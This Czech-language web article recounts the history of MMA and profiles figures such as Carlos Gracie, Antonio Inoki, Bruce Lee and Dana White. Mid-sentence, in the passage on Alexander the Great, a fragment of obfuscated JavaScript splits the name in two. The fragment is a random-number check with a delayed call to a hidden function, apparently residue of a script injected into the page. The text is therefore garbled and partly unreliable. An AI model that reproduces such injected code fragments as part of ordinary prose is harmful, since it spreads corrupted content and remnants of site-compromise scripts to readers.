MMA

HISTORIE MMA

PRVNÍ MMA ZÁPAS SE ODEHRÁL PŘED NAŠÍM LETOPOČTEM…

…prameny tvrdí, že roku 648 př. n. l. a to v rámci starořeckých olympijských her. Boj tenkrát neměl žádná pravidla. Zápas končil buď knock-outem jednoho účastníka nebo pokud se jeden z aktérů vzdal. Není tedy divu, že taková podívaná trvala často i několik hodin.

Část historiků se domnívá, že značný vliv měl na rozvoj bojových umění i Alexandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andr Veliký, díky jeho tažení se metody zápasu dostaly do Asie. Každopádně pak trvalo hned několik století, než se prvky původního bojového umění opět staly centrem pozornosti sportovců i jejich fanoušků.

ROZVOJ VE 20. STOLETÍ

Myšlenka původního starořeckého zápasu byla vzkříšena ve 20. letech minulého století v Brazílii, kde vznikl sport Jujitsu. Ten si ovšem musel, i díky dvěma světovým válkám, počkat dalších bezmála šedesát let, než si získal popularitu ve Spojených státech a na jeho základě se začalo vyvíjet MMA tak, jak ho známe dnes, včetně umístění bojovníků do osmiúhelníkové klece.

V roce 1993 vznikla organizace UFC – Ultimate Fighting Championship a MMA se postupně stalo více sportem než bojem, přičemž s jistými pravidly vzrostla bezpečnost. Dnešní podoba MMA je založena na full-kontaktním boji s širokým spektrem bojových technik, vycházejících z tradičních bojovým umění, jako je box, thajský box, judo, jiu-jitsu atd.

 

JAKÁ JMÉNA STOJÍ ZA NOVODOBÝM ROZKVĚTEM MMA?

CARLOS GRACIE (1902-1994)

Bývá spolu se svým mladším bratrem Héliem považován za otce brazilského jiu-jitsu. Zajímavostí je, že Carlos měl celkem 21 dětí, z nichž 13 získalo černý pás v brazilském jiu-jitsu. Když v roce 1994 zemřel, mohl se pochlubit 106 vnoučaty a 128 pravnoučaty.

 ANTONIO INOKI (1943)

Úspěšný japonský sportovec, profesionální wrestler, jehož legendární zápas s boxerem Muhammadem Alim položil základ smíšeným bojovým uměním. Narodil se v roce 1943 do bohaté japonské rodiny. Po válce ovšem s dědečkem, matkou a sourozenci emigroval do Brazílie. Do Japonska se posléze vrátil právě kvůli své velké sportovní lásce – wrestlingu. Byl to právě on, kdo dostal Aliho do Japonska a sám stanul v ringu proti němu. Ačkoliv byla pravidla zápasu vyhlášena několik měsíců předem, dva dny před zápasem byla stanovena nová, která poměrně radikálně omezovala možnosti obou aktérů. Bylo například ustanoveno, že Inoki mohl kopnout, pouze pokud měl jedno koleno na zemi. Zápas skončil remízou 3-3 a Ali utrpěl zranění obou nohou v důsledku Inokiho kopů.

BRUCE LEE (1940-1973)

Vezměte to nejlepší ze všech bojových umění, to nepoužitelné zahoďte“, řekl legendární zápasník, herec Bruce Lee, jehož mnozí považují za nejslavnějšího představitele bojových umění.

DANA WHITE (1969)

Prezident UFC, narodil se v americkém Connecticutu a byl velkým fanouškem boxu. Kromě toho má ale bezesporu i velké obchodní nadání. UFC totiž v devadesátých letech minulého století koupil za 2 miliony dolarů a po zhruba dvaceti letech společnost prodal za závratné 4 miliardy. Zůstal mu 9% podíl, který mu zajišťuje nadále každý rok výdělky v řádech několika set milionů dolarů.

BJORN REBNEY (1967)

Zakladatel organizace Bellator, jedné z největších světových MMA organizací, která vznikla v roce 2008 v americkém Chicagu. Jejím mottem je: „Titul si musíš zasloužit, ne získat“. Od roku 2016 působí Rebney jako poradce Mixed Martial Arts Athletes Association (MMAAA).